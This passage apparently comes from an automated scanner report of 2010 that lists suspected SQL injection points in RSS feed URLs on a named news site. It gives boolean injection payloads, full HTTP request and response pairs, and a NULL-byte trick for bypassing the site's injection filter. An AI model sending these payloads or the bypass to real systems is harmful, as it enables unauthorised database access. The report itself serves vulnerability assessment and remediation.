<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Date: Tue, 07 Dec 2010 23:19:12 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.32. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200749.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200749.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200749.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:28 GMT
Content-Length: 13375
Connection: close
Set-Cookie: JSESSIONID=X5FMJQDGGCUWMCUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.33. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200750.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200750.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 65316758'%20or%201%3d1--%20 and 65316758'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d1--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:20 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d2--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.34. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200753.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:27 GMT
Content-Length: 0
Connection: close


1.35. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200753.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 47711278%20or%201%3d1--%20 and 47711278%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d1--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:31 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d2--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.36. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200754.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200754.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 87447082'%20or%201%3d1--%20 and 87447082'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi87447082'%20or%201%3d1--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi87447082'%20or%201%3d2--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:26 GMT
Date: Tue, 07 Dec 2010 23:19:26 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.37. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200756.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200756.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:13 GMT
Content-Length: 0
Connection: close


1.38. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200757.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:01 GMT
Date: Tue, 07 Dec 2010 23:21:01 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.39. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200757.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:11 GMT
Content-Length: 0
Connection: close


1.40. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200759.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 24161260'%20or%201%3d1--%20 and 24161260'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d1--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:59 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d2--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:00 GMT
Content-Length: 0
Connection: close


1.41. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200759.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 35561059%20or%201%3d1--%20 and 35561059%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d1--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
